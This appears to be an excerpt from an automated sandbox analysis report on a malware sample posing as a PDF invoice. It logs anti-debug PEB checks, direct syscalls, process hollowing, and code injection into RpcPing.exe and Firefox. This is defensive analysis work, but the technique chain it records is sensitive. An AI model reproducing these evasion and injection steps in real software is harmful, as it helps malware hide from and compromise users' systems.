Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A36962 mov eax, dword ptr fs:[00000030h] 3_2_01A36962
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A36962 mov eax, dword ptr fs:[00000030h] 3_2_01A36962
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A36962 mov eax, dword ptr fs:[00000030h] 3_2_01A36962
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5096E mov eax, dword ptr fs:[00000030h] 3_2_01A5096E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5096E mov edx, dword ptr fs:[00000030h] 3_2_01A5096E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5096E mov eax, dword ptr fs:[00000030h] 3_2_01A5096E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB4978 mov eax, dword ptr fs:[00000030h] 3_2_01AB4978
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB4978 mov eax, dword ptr fs:[00000030h] 3_2_01AB4978
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9C97C mov eax, dword ptr fs:[00000030h] 3_2_01A9C97C
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE4940 mov eax, dword ptr fs:[00000030h] 3_2_01AE4940
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A90946 mov eax, dword ptr fs:[00000030h] 3_2_01A90946
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10887 mov eax, dword ptr fs:[00000030h] 3_2_01A10887
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9C89D mov eax, dword ptr fs:[00000030h] 3_2_01A9C89D
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADA8E4 mov eax, dword ptr fs:[00000030h] 3_2_01ADA8E4
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4C8F9 mov eax, dword ptr fs:[00000030h] 3_2_01A4C8F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4C8F9 mov eax, dword ptr fs:[00000030h] 3_2_01A4C8F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3E8C0 mov eax, dword ptr fs:[00000030h] 3_2_01A3E8C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE08C0 mov eax, dword ptr fs:[00000030h] 3_2_01AE08C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB483A mov eax, dword ptr fs:[00000030h] 3_2_01AB483A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB483A mov eax, dword ptr fs:[00000030h] 3_2_01AB483A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4A830 mov eax, dword ptr fs:[00000030h] 3_2_01A4A830
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h] 3_2_01A32835
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h] 3_2_01A32835
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h] 3_2_01A32835
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32835 mov ecx, dword ptr fs:[00000030h] 3_2_01A32835
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h] 3_2_01A32835
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h] 3_2_01A32835
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9C810 mov eax, dword ptr fs:[00000030h] 3_2_01A9C810
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA6870 mov eax, dword ptr fs:[00000030h] 3_2_01AA6870
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA6870 mov eax, dword ptr fs:[00000030h] 3_2_01AA6870
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9E872 mov eax, dword ptr fs:[00000030h] 3_2_01A9E872
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9E872 mov eax, dword ptr fs:[00000030h] 3_2_01A9E872
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A22840 mov ecx, dword ptr fs:[00000030h] 3_2_01A22840
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A40854 mov eax, dword ptr fs:[00000030h] 3_2_01A40854
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A14859 mov eax, dword ptr fs:[00000030h] 3_2_01A14859
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A14859 mov eax, dword ptr fs:[00000030h] 3_2_01A14859
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20BBE mov eax, dword ptr fs:[00000030h] 3_2_01A20BBE
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A20BBE mov eax, dword ptr fs:[00000030h] 3_2_01A20BBE
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC4BB0 mov eax, dword ptr fs:[00000030h] 3_2_01AC4BB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC4BB0 mov eax, dword ptr fs:[00000030h] 3_2_01AC4BB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A18BF0 mov eax, dword ptr fs:[00000030h] 3_2_01A18BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A18BF0 mov eax, dword ptr fs:[00000030h] 3_2_01A18BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A18BF0 mov eax, dword ptr fs:[00000030h] 3_2_01A18BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9CBF0 mov eax, dword ptr fs:[00000030h] 3_2_01A9CBF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3EBFC mov eax, dword ptr fs:[00000030h] 3_2_01A3EBFC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A30BCB mov eax, dword ptr fs:[00000030h] 3_2_01A30BCB
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A30BCB mov eax, dword ptr fs:[00000030h] 3_2_01A30BCB
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A30BCB mov eax, dword ptr fs:[00000030h] 3_2_01A30BCB
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10BCD mov eax, dword ptr fs:[00000030h] 3_2_01A10BCD
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10BCD mov eax, dword ptr fs:[00000030h] 3_2_01A10BCD
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10BCD mov eax, dword ptr fs:[00000030h] 3_2_01A10BCD
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABEBD0 mov eax, dword ptr fs:[00000030h] 3_2_01ABEBD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3EB20 mov eax, dword ptr fs:[00000030h] 3_2_01A3EB20
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3EB20 mov eax, dword ptr fs:[00000030h] 3_2_01A3EB20
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD8B28 mov eax, dword ptr fs:[00000030h] 3_2_01AD8B28
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD8B28 mov eax, dword ptr fs:[00000030h] 3_2_01AD8B28
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE4B00 mov eax, dword ptr fs:[00000030h] 3_2_01AE4B00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h] 3_2_01A8EB1D
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A0CB7E mov eax, dword ptr fs:[00000030h] 3_2_01A0CB7E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AC4B4B mov eax, dword ptr fs:[00000030h] 3_2_01AC4B4B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB8B42 mov eax, dword ptr fs:[00000030h] 3_2_01AB8B42
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA6B40 mov eax, dword ptr fs:[00000030h] 3_2_01AA6B40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ADAB40 mov eax, dword ptr fs:[00000030h] 3_2_01ADAB40
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A08B50 mov eax, dword ptr fs:[00000030h] 3_2_01A08B50
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE2B57 mov eax, dword ptr fs:[00000030h] 3_2_01AE2B57
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABEB50 mov eax, dword ptr fs:[00000030h] 3_2_01ABEB50
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A18AA0 mov eax, dword ptr fs:[00000030h] 3_2_01A18AA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A66AA4 mov eax, dword ptr fs:[00000030h] 3_2_01A66AA4
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h] 3_2_01A1EA80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE4A80 mov eax, dword ptr fs:[00000030h] 3_2_01AE4A80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A48A90 mov edx, dword ptr fs:[00000030h] 3_2_01A48A90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4AAEE mov eax, dword ptr fs:[00000030h] 3_2_01A4AAEE
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A66ACC mov eax, dword ptr fs:[00000030h] 3_2_01A66ACC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A10AD0 mov eax, dword ptr fs:[00000030h] 3_2_01A10AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A44AD0 mov eax, dword ptr fs:[00000030h] 3_2_01A44AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4CA24 mov eax, dword ptr fs:[00000030h] 3_2_01A4CA24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A3EA2E mov eax, dword ptr fs:[00000030h] 3_2_01A3EA2E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A34A35 mov eax, dword ptr fs:[00000030h] 3_2_01A34A35
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9CA11 mov eax, dword ptr fs:[00000030h] 3_2_01A9CA11
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h] 3_2_01A4CA6F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABEA60 mov eax, dword ptr fs:[00000030h] 3_2_01ABEA60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8CA72 mov eax, dword ptr fs:[00000030h] 3_2_01A8CA72
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory written: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Thread register set: target process: 8104 Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Thread APC queued: target process: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" Jump to behavior
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
